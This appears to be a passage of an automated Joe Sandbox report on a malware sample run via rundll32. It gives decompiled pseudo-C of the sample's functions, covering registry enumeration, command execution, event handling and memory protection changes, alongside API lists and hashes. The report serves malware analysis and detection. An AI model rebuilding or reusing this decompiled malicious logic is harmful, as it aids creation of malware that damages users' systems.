                                          				signed char _t56;
                                          				intOrPtr _t58;
                                          				signed int _t59;
                                          				void* _t63;
                                          				CHAR* _t67;
                                          				CHAR* _t68;
                                          				char* _t69;
                                          				void* _t70;
                                          
                                          				_t61 = __edx;
                                          				_v20 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_t21 = E0489175D();
                                          				if(_t21 != 0) {
                                          					_t59 =  *0x489a2fc; // 0x4000000a
                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                          					 *0x489a2fc = (_t59 & 0xf0000000) + _t21;
                                          				}
                                          				_t22 =  *0x489a178(0, 2); // executed
                                          				_v16 = _t22;
                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                          					_t25 = E04895765( &_v8,  &_v20); // executed
                                          					_t54 = _t25;
                                          					_t26 =  *0x489a348; // 0x9ad5a8
                                          					if( *0x489a2fc > 5) {
                                          						_t8 = _t26 + 0x489b5cd; // 0x4d283a53
                                          						_t27 = _t8;
                                          					} else {
                                          						_t7 = _t26 + 0x489b9f5; // 0x44283a44
                                          						_t27 = _t7;
                                          					}
                                          					E04893EF8(_t27, _t27);
                                          					_t31 = E04895410(_t61,  &_v20,  &_v12); // executed
                                          					if(_t31 == 0) {
                                          						CloseHandle(_v20);
                                          					}
                                          					_t63 = 5;
                                          					if(_t54 != _t63) {
                                          						 *0x489a310 =  *0x489a310 ^ 0x81bbe65d;
                                          						_t32 = E04894DF6(0x60);
                                          						 *0x489a3cc = _t32;
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							_push(8);
                                          							_pop(0);
                                          						} else {
                                          							memset(_t32, 0, 0x60);
                                          							_t49 =  *0x489a3cc; // 0x52495b0
                                          							_t70 = _t70 + 0xc;
                                          							__imp__(_t49 + 0x40);
                                          							_t51 =  *0x489a3cc; // 0x52495b0
                                          							 *_t51 = 0x489b81a;
                                          						}
                                          						_t54 = 0;
                                          						__eflags = 0;
                                          						if(0 == 0) {
                                          							_t36 = RtlAllocateHeap( *0x489a2d8, 0, 0x43);
                                          							 *0x489a368 = _t36;
                                          							__eflags = _t36;
                                          							if(_t36 == 0) {
                                          								_push(8);
                                          								_pop(0);
                                          							} else {
                                          								_t56 =  *0x489a2fc; // 0x4000000a
                                          								_t61 = _t56 & 0x000000ff;
                                          								_t58 =  *0x489a348; // 0x9ad5a8
                                          								_t13 = _t58 + 0x489b55a; // 0x697a6f4d
                                          								_t55 = _t13;
                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4899287);
                                          							}
                                          							_t54 = 0;
                                          							__eflags = 0;
                                          							if(0 == 0) {
                                          								asm("sbb eax, eax");
                                          								E048912D3( ~_v8 &  *0x489a310, 0x489a00c); // executed
                                          								_t42 = E0489475F(0, _t55, _t63, 0x489a00c); // executed
                                          								_t54 = _t42;
                                          								__eflags = _t54;
                                          								if(_t54 != 0) {
                                          									goto L30;
                                          								}
                                          								_t43 = E048921FC(); // executed
                                          								__eflags = _t43;
                                          								if(_t43 != 0) {
                                          									__eflags = _v8;
                                          									_t67 = _v12;
                                          									if(_v8 != 0) {
                                          										L29:
                                          										_t44 = E04896B13(_t61, _t67, _v8); // executed
                                          										_t54 = _t44;
                                          										goto L30;
                                          									}
                                          									__eflags = _t67;
                                          									if(__eflags == 0) {
                                          										goto L30;
                                          									}
                                          									_t54 = E04894ECB(__eflags,  &(_t67[4]));
                                          									__eflags = _t54;
                                          									if(_t54 == 0) {
                                          										goto L30;
                                          									}
                                          									goto L29;
                                          								}
                                          								_t54 = 8;
                                          							}
                                          						}
                                          					} else {
                                          						_t68 = _v12;
                                          						if(_t68 == 0) {
                                          							L30:
                                          							if(_v16 == 0 || _v16 == 1) {
                                          								 *0x489a17c(); // executed
                                          							}
                                          							goto L34;
                                          						}
                                          						_t69 =  &(_t68[4]);
                                          						do {
                                          						} while (E04893E6C(_t63, _t69, 0, 1) == 0x4c7);
                                          					}
                                          					goto L30;
                                          				} else {
                                          					_t54 = _t22;
                                          					L34:
                                          					return _t54;
                                          				}
                                          			}
                                          0x04892c52
                                          0x04892c5c
                                          0x04892c5f
                                          0x04892c62
                                          0x04892c65
                                          0x04892c6c
                                          0x04892c6e
                                          0x04892c7a
                                          0x04892c7c
                                          0x04892c7c
                                          0x04892c85
                                          0x04892c8b
                                          0x04892c90
                                          0x04892caa
                                          0x04892cb6
                                          0x04892cb8
                                          0x04892cbd
                                          0x04892cc7
                                          0x04892cc7
                                          0x04892cbf
                                          0x04892cbf
                                          0x04892cbf
                                          0x04892cbf
                                          0x04892cce
                                          0x04892cdb
                                          0x04892ce2
                                          0x04892ce7
                                          0x04892ce7
                                          0x04892cf0
                                          0x04892cf3
                                          0x04892d19
                                          0x04892d25
                                          0x04892d2a
                                          0x04892d2f
                                          0x04892d31
                                          0x04892d5d
                                          0x04892d5f
                                          0x04892d33
                                          0x04892d37
                                          0x04892d3c
                                          0x04892d41
                                          0x04892d48
                                          0x04892d4e
                                          0x04892d53
                                          0x04892d59
                                          0x04892d60
                                          0x04892d62
                                          0x04892d64
                                          0x04892d73
                                          0x04892d79
                                          0x04892d7e
                                          0x04892d80
                                          0x04892db0
                                          0x04892db2
                                          0x04892d82
                                          0x04892d82
                                          0x04892d88
                                          0x04892d95
                                          0x04892d9b
                                          0x04892d9b
                                          0x04892da3
                                          0x04892dac
                                          0x04892db3
                                          0x04892db5
                                          0x04892db7
                                          0x04892dbe
                                          0x04892dcb
                                          0x04892dd0
                                          0x04892dd5
                                          0x04892dd7
                                          0x04892dd9
                                          0x00000000
                                          0x00000000
                                          0x04892ddb
                                          0x04892de0
                                          0x04892de2
                                          0x04892de9
                                          0x04892ded
                                          0x04892df0
                                          0x04892e05
                                          0x04892e09
                                          0x04892e0e
                                          0x00000000
                                          0x04892e0e
                                          0x04892df2
                                          0x04892df4
                                          0x00000000
                                          0x00000000
                                          0x04892dff
                                          0x04892e01
                                          0x04892e03
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04892e03
                                          0x04892de6
                                          0x04892de6
                                          0x04892db7
                                          0x04892cf5
                                          0x04892cf5
                                          0x04892cfa
                                          0x04892e10
                                          0x04892e15
                                          0x04892e1d
                                          0x04892e1d
                                          0x00000000
                                          0x04892e15
                                          0x04892d00
                                          0x04892d03
                                          0x04892d0d
                                          0x04892d14
                                          0x00000000
                                          0x04892e25
                                          0x04892e25
                                          0x04892e28
                                          0x04892e2c
                                          0x04892e2c

                                          APIs
                                            • Part of subcall function 0489175D: GetModuleHandleA.KERNEL32(4C44544E,00000000,04892C6A,00000001), ref: 0489176C
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04892CE7
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • memset.NTDLL ref: 04892D37
                                          • RtlInitializeCriticalSection.NTDLL(05249570), ref: 04892D48
                                            • Part of subcall function 04894ECB: memset.NTDLL ref: 04894EE5
                                            • Part of subcall function 04894ECB: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04894F2B
                                            • Part of subcall function 04894ECB: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 04894F36
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04892D73
                                          • wsprintfA.USER32 ref: 04892DA3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: 9ab89c97c2ab909c9cf5b00b779ade5171428ade523fa860de1c3cb795b53e02
                                          • Instruction ID: f6d618f27fc6a443e5db907080e72c35678bdaef1ccbf9f17e1fcc7819e54939
                                          • Opcode Fuzzy Hash: 9ab89c97c2ab909c9cf5b00b779ade5171428ade523fa860de1c3cb795b53e02
                                          • Instruction Fuzzy Hash: F8518071B01E1ABBEF15EBA8DC84A5E73E8EB04718F1C4EA5E501D7141EBB4BD408B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 22%
                                          			E048970AE(signed int __eax, signed int _a4, signed int _a8) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				signed int _v20;
                                          				intOrPtr _t81;
                                          				char _t83;
                                          				signed int _t90;
                                          				signed int _t97;
                                          				signed int _t99;
                                          				char _t101;
                                          				unsigned int _t102;
                                          				intOrPtr _t103;
                                          				char* _t107;
                                          				signed int _t110;
                                          				signed int _t113;
                                          				signed int _t118;
                                          				signed int _t122;
                                          				intOrPtr _t124;
                                          
                                          				_t102 = _a8;
                                          				_t118 = 0;
                                          				_v20 = __eax;
                                          				_t122 = (_t102 >> 2) + 1;
                                          				_v8 = 0;
                                          				_a8 = 0;
                                          				_t81 = E04894DF6(_t122 << 2);
                                          				_v16 = _t81;
                                          				if(_t81 == 0) {
                                          					_push(8);
                                          					_pop(0);
                                          					L37:
                                          					return 0;
                                          				}
                                          				_t107 = _a4;
                                          				_a4 = _t102;
                                          				_t113 = 0;
                                          				while(1) {
                                          					_t83 =  *_t107;
                                          					if(_t83 == 0) {
                                          						break;
                                          					}
                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                          						if(_t118 != 0) {
                                          							if(_t118 > _v8) {
                                          								_v8 = _t118;
                                          							}
                                          							_a8 = _a8 + 1;
                                          							_t118 = 0;
                                          						}
                                          						 *_t107 = 0;
                                          						goto L16;
                                          					} else {
                                          						if(_t118 != 0) {
                                          							L10:
                                          							_t118 = _t118 + 1;
                                          							L16:
                                          							_t107 = _t107 + 1;
                                          							_t15 =  &_a4;
                                          							 *_t15 = _a4 - 1;
                                          							if( *_t15 != 0) {
                                          								continue;
                                          							}
                                          							break;
                                          						}
                                          						if(_t113 == _t122) {
                                          							L21:
                                          							if(_a8 <= 0x20) {
                                          								_push(0xb);
                                          								L34:
                                          								_pop(0);
                                          								L35:
                                          								E04894C73(_v16);
                                          								goto L37;
                                          							}
                                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                                          							_t103 = E04894DF6((_v8 + _t24) * _a8 + 4);
                                          							if(_t103 == 0) {
                                          								_push(8);
                                          								goto L34;
                                          							}
                                          							_t90 = _a8;
                                          							_a4 = _a4 & 0x00000000;
                                          							_v8 = _v8 & 0x00000000;
                                          							_t124 = _t103 + _t90 * 4;
                                          							if(_t90 <= 0) {
                                          								L31:
                                          								 *0x489a318 = _t103;
                                          								goto L35;
                                          							}
                                          							do {
                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                          								_v12 = _v12 & 0x00000000;
                                          								if(_a4 <= 0) {
                                          									goto L30;
                                          								} else {
                                          									goto L26;
                                          								}
                                          								while(1) {
                                          									L26:
                                          									_t99 = _v12;
                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                          									if(_t99 == 0) {
                                          										break;
                                          									}
                                          									_v12 = _v12 + 1;
                                          									if(_v12 < _a4) {
                                          										continue;
                                          									}
                                          									goto L30;
                                          								}
                                          								_v8 = _v8 - 1;
                                          								L30:
                                          								_t97 = _a4;
                                          								_a4 = _a4 + 1;
                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                          								__imp__(_t124);
                                          								_v8 = _v8 + 1;
                                          								_t124 = _t124 + _t97 + 1;
                                          							} while (_v8 < _a8);
                                          							goto L31;
                                          						}
                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                          						_t101 = _t83;
                                          						if(_t83 - 0x61 <= 0x19) {
                                          							_t101 = _t101 - 0x20;
                                          						}
                                          						 *_t107 = _t101;
                                          						_t113 = _t113 + 1;
                                          						goto L10;
                                          					}
                                          				}
                                          				if(_t118 != 0) {
                                          					if(_t118 > _v8) {
                                          						_v8 = _t118;
                                          					}
                                          					_a8 = _a8 + 1;
                                          				}
                                          				goto L21;
                                          			}

                                          APIs
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • lstrcpy.KERNEL32(69B25F45,00000020), ref: 048971AB
                                          • lstrcat.KERNEL32(69B25F45,00000020), ref: 048971C0
                                          • lstrcmp.KERNEL32(00000000,69B25F45), ref: 048971D7
                                          • lstrlen.KERNEL32(69B25F45), ref: 048971FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3214092121-3916222277
                                          • Opcode ID: 3499e85d9d5042cd271c5d29423e143773bd00be1264cfa5e8d8742645b22009
                                          • Instruction ID: 46d887718f6fdd9e32deea04e0a37d67c6462ea0a860b16c41847a2e9a28349f
                                          • Opcode Fuzzy Hash: 3499e85d9d5042cd271c5d29423e143773bd00be1264cfa5e8d8742645b22009
                                          • Instruction Fuzzy Hash: 2451AD31A10908EFDF25CF99C8846ADBBF6FF45314F188A5AE815EB201C770AE41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04891666(signed int _a4, signed int* _a8) {
                                          				void* __ecx;
                                          				void* __edi;
                                          				signed int _t6;
                                          				intOrPtr _t8;
                                          				intOrPtr _t12;
                                          				long _t14;
                                          				void* _t18;
                                          				WCHAR* _t19;
                                          				long _t20;
                                          				void* _t25;
                                          				signed int* _t28;
                                          				CHAR* _t30;
                                          				long _t31;
                                          				WCHAR** _t32;
                                          
                                          				_t6 =  *0x489a310; // 0xd448b889
                                          				_t32 = _a4;
                                          				_a4 = _t6 ^ 0x109a6410;
                                          				_t8 =  *0x489a348; // 0x9ad5a8
                                          				_t3 = _t8 + 0x489b87e; // 0x61636f4c
                                          				_t25 = 0;
                                          				_t30 = E04894B16(_t3, 1);
                                          				if(_t30 != 0) {
                                          					_t25 = CreateEventA(0x489a34c, 1, 0, _t30);
                                          					E04894C73(_t30);
                                          				}
                                          				_t12 =  *0x489a2fc; // 0x4000000a
                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
                                          					L12:
                                          					_t28 = _a8;
                                          					if(_t28 != 0) {
                                          						 *_t28 =  *_t28 | 0x00000001;
                                          					}
                                          					_t14 = E04892384(_t32, 0); // executed
                                          					_t31 = _t14;
                                          					if(_t31 == 0 && _t25 != 0) {
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          					}
                                          					if(_t28 != 0 && _t31 != 0) {
                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                          					}
                                          					goto L20;
                                          				} else {
                                          					_t18 = E04896DB6(); // executed
                                          					if(_t18 != 0) {
                                          						goto L12;
                                          					}
                                          					_t19 = StrChrW( *_t32, 0x20);
                                          					if(_t19 != 0) {
                                          						 *_t19 = 0;
                                          						_t19 =  &(_t19[1]);
                                          					}
                                          					_t20 = E04893E6C(0,  *_t32, _t19, 0); // executed
                                          					_t31 = _t20;
                                          					if(_t31 == 0) {
                                          						if(_t25 == 0) {
                                          							L22:
                                          							return _t31;
                                          						}
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          						if(_t31 == 0) {
                                          							L20:
                                          							if(_t25 != 0) {
                                          								FindCloseChangeNotification(_t25); // executed
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					goto L12;
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 04894B16: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05249DA0,00000000,?,?,69B25F44,00000005,0489A00C,4D283A53,?,?), ref: 04894B4C
                                            • Part of subcall function 04894B16: lstrcpy.KERNEL32(00000000,00000000), ref: 04894B70
                                            • Part of subcall function 04894B16: lstrcat.KERNEL32(00000000,00000000), ref: 04894B78
                                          • CreateEventA.KERNEL32(0489A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04892AA1,?,?,?), ref: 048916A7
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          • StrChrW.SHLWAPI(04892AA1,00000020,61636F4C,00000001,00000000,?,?,00000000,?,04892AA1,?,?,?), ref: 048916DA
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04892AA1,00000000,00000000,?,00000000,?,04892AA1,?,?,?), ref: 04891707
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04892AA1,?,?,?), ref: 04891735
                                          • FindCloseChangeNotification.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04892AA1,?,?,?), ref: 0489174D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$ChangeCloseCreateEventFindFreeHeapNotificationlstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3294472205-0
                                          • Opcode ID: 8c1738e4fcefcb9486c98d5eeffc2c0d4bda559de3beef1c13b1ca687238f1a1
                                          • Instruction ID: 4a8818394f300cf827a4544b6228f1d1f83c3e2fbb77e0b253636b288ea2cb2e
                                          • Opcode Fuzzy Hash: 8c1738e4fcefcb9486c98d5eeffc2c0d4bda559de3beef1c13b1ca687238f1a1
                                          • Instruction Fuzzy Hash: 6421E632708F537BEF315AA89C88A6AB3D9EB88B54B0D0F29F911E7144DB75EC018751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B6BAC0: RegCreateKeyA.ADVAPI32(80000001,0614B7F0,?), ref: 00B6BAD5
                                            • Part of subcall function 00B6BAC0: lstrlen.KERNEL32(0614B7F0,00000000,00000000,00B7806E,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B6BAFE
                                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF26
                                          • RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                          • String ID:
                                          • API String ID: 1633053242-0
                                          • Opcode ID: 00d8bac31bb294bfcc3e9675880853b624feeabb93652b2b67631447c56b789e
                                          • Instruction ID: 29d0e7ad829d0a91392aa9c4501f8a23ad3387b6b507b614816c75137aeb3839
                                          • Opcode Fuzzy Hash: 00d8bac31bb294bfcc3e9675880853b624feeabb93652b2b67631447c56b789e
                                          • Instruction Fuzzy Hash: 921149B6510209BFEF059F94DC84CEE7BBEEB48355B1404A6F90593220DB319E949B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B54366
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5437F
                                          • OpenProcess.KERNEL32(00000400,00000000,69B25F44,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?), ref: 00B5439C
                                          • IsWow64Process.KERNEL32(?,00000000,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000), ref: 00B543AD
                                          • FindCloseChangeNotification.KERNEL32(?,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B543C0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                                          • String ID:
                                          • API String ID: 1712524627-0
                                          • Opcode ID: ea40e502a3f31f4635b6ff8fe41be50a7ba6032d526a9553c0a4c0da29a95f83
                                          • Instruction ID: a7fd02207b6d9e380dcff2fc16778e5f4b5d6e8a836065bba016d9dfd7f758ec
                                          • Opcode Fuzzy Hash: ea40e502a3f31f4635b6ff8fe41be50a7ba6032d526a9553c0a4c0da29a95f83
                                          • Instruction Fuzzy Hash: BB015771900208EFDB11EF68DC489AA7BF8FB8474671042A9E909E3220EB304E89DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualProtect.KERNEL32(00000000,00000000,00000040,00B51765,?,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A117
                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A11F
                                          • VirtualQuery.KERNEL32(00000000,?,0000001C,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A136
                                          • VirtualProtect.KERNEL32(00000000,00000000,-2C9B417C,00B51765,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A15B
                                          • SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A164
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$ErrorLastProtect$Query
                                          • String ID:
                                          • API String ID: 148356745-0
                                          • Opcode ID: 4ad5b522154fa3497026663e6ff43c16dcdc3c58da156bc99257e8d22f08e0ad
                                          • Instruction ID: 2a5f6f68a0d3df803020271367849d4d1be21a87060343456a65e0bfeddb994c
                                          • Opcode Fuzzy Hash: 4ad5b522154fa3497026663e6ff43c16dcdc3c58da156bc99257e8d22f08e0ad
                                          • Instruction Fuzzy Hash: C9012972500209FF9F119F95DC4499ABBBDFF19251B004066FA05E3120DB71D995DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B5EADA
                                          • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 00B5EB64
                                          • WaitForSingleObject.KERNEL32(00000064), ref: 00B5EB72
                                          • SuspendThread.KERNEL32(?), ref: 00B5EB85
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                          • String ID:
                                          • API String ID: 3168247402-0
                                          • Opcode ID: 5bba965c84f4e27a7270c514a4232f1ad4252afb04e0d409185a976432ec6629
                                          • Instruction ID: 9c59035a79fdea018cdd5f6b1975a363e3c9243af97d2415a9025b4c615e90d2
                                          • Opcode Fuzzy Hash: 5bba965c84f4e27a7270c514a4232f1ad4252afb04e0d409185a976432ec6629
                                          • Instruction Fuzzy Hash: 11418F71108301AFE721DF54C881E6BBBE9FF88311F0049ADFAA592161D731EA59CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 0489105D
                                          • SysAllocString.OLEAUT32(04896ECE), ref: 048910A1
                                          • SysFreeString.OLEAUT32(00000000), ref: 048910B5
                                          • SysFreeString.OLEAUT32(00000000), ref: 048910C3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: ff481f07cd22fb7267288a3f9a588188016a9c0cce1aeb070eaa81d20963eec5
                                          • Instruction ID: 71ccef0a269bd293d0ff6cb7e2341cd031b45f4b25e88c61424b613c34d22b03
                                          • Opcode Fuzzy Hash: ff481f07cd22fb7267288a3f9a588188016a9c0cce1aeb070eaa81d20963eec5
                                          • Instruction Fuzzy Hash: 83311AB190464ABFDF04DF98D8848AE7BF9FB48340B14892AE905D7250D676AD41CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0489737F(void* __ecx, intOrPtr _a4) {
                                          				int* _v8;
                                          				int _v12;
                                          				int* _v16;
                                          				int _v20;
                                          				int* _v24;
                                          				char* _v28;
                                          				void* _v32;
                                          				long _t33;
                                          				char* _t35;
                                          				long _t39;
                                          				long _t42;
                                          				intOrPtr _t47;
                                          				void* _t51;
                                          				long _t53;
                                          
                                          				_t51 = __ecx;
                                          				_v8 = 0;
                                          				_v16 = 0;
                                          				_v12 = 0;
                                          				_v24 = 0;
                                          				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                                          				_t53 = _t33;
                                          				if(_t53 != 0) {
                                          					L18:
                                          					return _t53;
                                          				}
                                          				_t53 = 8;
                                          				_t35 = E04894DF6(0x104);
                                          				_v28 = _t35;
                                          				if(_t35 == 0) {
                                          					L17:
                                          					RegCloseKey(_v32); // executed
                                          					goto L18;
                                          				}
                                          				_v20 = 0x104;
                                          				do {
                                          					_v16 = _v20;
                                          					_v12 = 0x104;
                                          					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                                          					_t53 = _t39;
                                          					if(_t53 != 0xea) {
                                          						if(_t53 != 0) {
                                          							L14:
                                          							if(_t53 == 0x103) {
                                          								_t53 = 0;
                                          							}
                                          							L16:
                                          							E04894C73(_v28);
                                          							goto L17;
                                          						}
                                          						_t42 = E04896E20(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                                          						_t53 = _t42;
                                          						if(_t53 != 0) {
                                          							goto L14;
                                          						}
                                          						goto L12;
                                          					}
                                          					if(_v12 <= 0x104) {
                                          						if(_v16 <= _v20) {
                                          							goto L16;
                                          						}
                                          						E04894C73(_v24);
                                          						_v20 = _v16;
                                          						_t47 = E04894DF6(_v16);
                                          						_v24 = _t47;
                                          						if(_t47 != 0) {
                                          							L6:
                                          							_t53 = 0;
                                          							goto L12;
                                          						}
                                          						_t53 = 8;
                                          						goto L16;
                                          					}
                                          					_v8 = _v8 + 1;
                                          					goto L6;
                                          					L12:
                                          				} while (WaitForSingleObject( *0x489a30c, 0) == 0x102);
                                          				goto L16;
                                          			}

                                          0x0489737f
                                          0x04897399
                                          0x0489739c
                                          0x0489739f
                                          0x048973a2
                                          0x048973a5
